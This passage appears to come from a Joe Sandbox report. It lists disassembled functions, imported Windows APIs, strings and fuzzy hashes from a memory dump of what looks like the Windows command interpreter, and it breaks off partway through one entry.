Download Yara Rule

APIs

RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF683F9B934
GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF683F85085), ref: 00007FF683F9B9A5
GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF683F85085), ref: 00007FF683F9B9F7

Strings

%WINDOWS_COPYRIGHT%, xrefs: 00007FF683F9B912

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Global$AllocAsciizCreateFreeFromStringUnicode
String ID: %WINDOWS_COPYRIGHT%
API String ID: 1103618819-1745581171
Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
Instruction ID: 8c975836badf0f4176f3a94a4b49ca673d2ac25b182aba5132001a2cb899fb9c
Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
Instruction Fuzzy Hash: 5241E762E19782C2EB108F15D41227977A4FF49B94F498239DE8DA3395DF3CE841C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683FA0774 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683FA07DA

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

_wcslwr.MSVCRT ref: 00007FF683FA085B
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683FA08A9

Strings

[%s], xrefs: 00007FF683FA080F

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$_wcslwr
String ID: [%s]
API String ID: 886762496-302437576
Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
Instruction ID: fc315d432b8a17d689a1576b2f88b85079874ebd48f6ec43583b5acd36b47bcb
Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
Instruction Fuzzy Hash: 58313832705A8285EB218F21E9513E967A0FF89B88F484139DA8DAB755DF3CD645C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F832E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F833A8: iswspace.MSVCRT ref: 00007FF683F833C0

iswspace.MSVCRT ref: 00007FF683F8331C

Strings

off, xrefs: 00007FF683F83386

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: iswspace
String ID: off
API String ID: 2389812497-733764931
Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
Instruction ID: 00735da4d985232182e395d6dc5451faff2721e0c69359a303a2b321f3465a2b
Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
Instruction Fuzzy Hash: 2F216D25F4C652C2FE689B16A51327D66A0FF59B80F4C803ED90EE76A0DF2CE440C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F99308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00007FF683F99350

Part of subcall function 00007FF683F809F4: iswspace.MSVCRT ref: 00007FF683F80A11
Part of subcall function 00007FF683F809F4: wcschr.MSVCRT ref: 00007FF683F80A2B

Part of subcall function 00007FF683F7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D46E
Part of subcall function 00007FF683F7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D485
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D4EE
Part of subcall function 00007FF683F7D3F0: iswspace.MSVCRT ref: 00007FF683F7D54D
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D569
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D58C

Strings

DPATH, xrefs: 00007FF683F99361, 00007FF683F9939F
PATH, xrefs: 00007FF683F99371, 00007FF683F993AA
%s=%s, xrefs: 00007FF683F993C0

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr$Heapiswspace$AllocProcess
String ID: %s=%s$DPATH$PATH
API String ID: 3731854180-3148396303
Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
Instruction ID: d8879ed07336306e66fd6888f7098cd52d4d2e3be92b1a5d5d7304d29ad08159
Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
Instruction Fuzzy Hash: 31218826B09642C1EE588F56E44267A23A4BF88B84F8D413DDD4EE7795DF2CE440C3C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F88198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

wcscmp.MSVCRT ref: 00007FF683F881EA
wcscmp.MSVCRT ref: 00007FF683F881FD

Strings

*.*, xrefs: 00007FF683F881E0
????????.???, xrefs: 00007FF683F881F3

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcscmp
String ID: *.*$????????.???
API String ID: 3392835482-3870530610
Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
Instruction ID: ef7475bb1b0ea7f183deecbbcca64c57fd1d86cad5ef25c18d37aea0f0346e36
Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
Instruction Fuzzy Hash: DC115A25B64A62C1EA688B27E44252962A1FF44B80B1D5039DE8DA7B89DE3DE481C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F99114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF683F99146

Strings

%s, xrefs: 00007FF683F99179
Null environment, xrefs: 00007FF683F99138
CMD Internal Error %s, xrefs: 00007FF683F9913F

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: fprintf
String ID: CMD Internal Error %s$%s$Null environment
API String ID: 383729395-2781220306
Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
Instruction ID: 01de79dcb9f7e3361123d8d3dc85d23893550fa4281f3fec34d69c87fcfbc569
Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
Instruction Fuzzy Hash: 81119121908642C1EA559F15E9020BA63A1FF44BF4F49433ADA7DA32E4EF2CE481C3C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F809F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

iswspace.MSVCRT ref: 00007FF683F80A11
wcschr.MSVCRT ref: 00007FF683F80A2B

Strings

=,;, xrefs: 00007FF683F80A24
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, xrefs: 00007FF683F809FE

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: iswspacewcschr
String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
API String ID: 287713880-1183017076
Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
Instruction ID: 39fa8ca49812355d70bb1fbdf54fef19b06481b443bea48f91165844777ad5ee
Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
Instruction Fuzzy Hash: 3DF04421A58653E1EA688B42E8421B66590FF45F40BCE9139D95EA3354DF2CE444C680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F804F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF683F80525
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF683F80554

Strings

SetThreadUILanguage, xrefs: 00007FF683F8054D
KERNEL32.DLL, xrefs: 00007FF683F8051E

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: KERNEL32.DLL$SetThreadUILanguage
API String ID: 1646373207-2530943252
Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
Instruction ID: f3261ef6ed6eaf127a815f33e02813b67e8aeded42518f6214f12735833a20dc
Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
Instruction Fuzzy Hash: 4301E5A1A0AA06D5EA488B11A89317462A0FF45734B98073DD53EB77E0DE6C6481C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F973C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF683F973DF
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF683F973F5

Strings

kernelbase.dll, xrefs: 00007FF683F973D5
RaiseFailFastException, xrefs: 00007FF683F973EE

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RaiseFailFastException$kernelbase.dll
API String ID: 1646373207-919018592
Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
Instruction ID: 5492c3a042fbcbe9dc483867e74f55cd7f625794963fb84e55626c4168382517
Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
Instruction Fuzzy Hash: 9BF03A21A18B81D2EA009F12F445079AA60FF89BD5B489139DE4E63B14CF3CD485CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F71130 Relevance: 6.2, APIs: 4, Instructions: 156COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F7138B

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

Part of subcall function 00007FF683F71140: towupper.MSVCRT ref: 00007FF683F711D3

Part of subcall function 00007FF683F8417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F841AD

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F714A6

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$CurrentDirectorytowupper
String ID:
API String ID: 1403193329-0
Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
Instruction ID: 8115e92bc0eeeccec74afb4f2a1079d4f7085eb071cb28c3562fecb6b0cf3654
Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
Instruction Fuzzy Hash: 33619A32A08B82CAEB24CF6598416ED37B5FF88748F184139DE5DA7A99DF38E450C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F84878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 00007FF683F848DE
_wcsnicmp.MSVCRT ref: 00007FF683F848FF
wcschr.MSVCRT ref: 00007FF683F8493E

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsnicmp$wcschr
String ID:
API String ID: 3270668897-0
Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
Instruction ID: 79ae18e64660c0f74a1d8fe61ece716fa83cbfcf31db6c042f24cc73e04d1f40
Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
Instruction Fuzzy Hash: 6951BB12E4C642C1FB69AF12A8021B963A0FF55B84F5D8139CA5EA73D5EE2CE845C3D0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9F358 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F9F3B5

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9F401
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9F442
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F9F468

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$DriveFullNamePathType
String ID:
API String ID: 3442494845-0
Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
Instruction ID: abb7ea8da7633e649db1db4f2ba78d08754a505777dc262ab9e8ab368259bba2
Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
Instruction Fuzzy Hash: 5F318B32619BC2CAEB60CF25E8417E977A4FB88B89F484139EA4D97B54CF38D645C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F88F80 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00007FF683F88FF3
RtlLookupFunctionEntry.NTDLL ref: 00007FF683F89012
RtlVirtualUnwind.NTDLL ref: 00007FF683F8905F
__raise_securityfailure.LIBCMT ref: 00007FF683F89144

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
Instruction ID: 6e95551671bc0e7e6f875b30cc53f58bd53bf3fd0f2dae37d592031cb101a58b
Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
Instruction Fuzzy Hash: DF41CB75609B41C6EB508B19F8A23A573A4FF88748F58403AE98DE37A4DFBDE444C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F74F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F929C4
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F929E9
_get_osfhandle.MSVCRT ref: 00007FF683F92A22
SetFileTime.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F92A39

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: File_get_osfhandle$TimeWrite
String ID:
API String ID: 4019809305-0
Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
Instruction ID: 86f891022e70dddc3af5d518beac2f0daaafe593a2f34dacde5c087219866677
Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
Instruction Fuzzy Hash: 53318122A08686D6E7904F159842378A6A5FF49B54F18523CDD4DA7BD5CF3CD854C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F88470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON

Download Yara Rule

APIs

wcstol.MSVCRT ref: 00007FF683F8848E
wcstol.MSVCRT ref: 00007FF683F884A8
lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0 ref: 00007FF683F8853F

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcstol$lstrcmp
String ID:
API String ID: 3515581199-0
Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
Instruction ID: 4b5dc7bc4759c0e87f8da714a93ea0eebfa64a4d6cc7ac81a13aeac2e165277b
Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
Instruction Fuzzy Hash: 2221E432A49642C3EB684F7AE49613AABA0FF49750F09503CCB4F97654CF6CE444C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9E810 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F9E836
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9E855
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F9E877
DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9E8AE

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
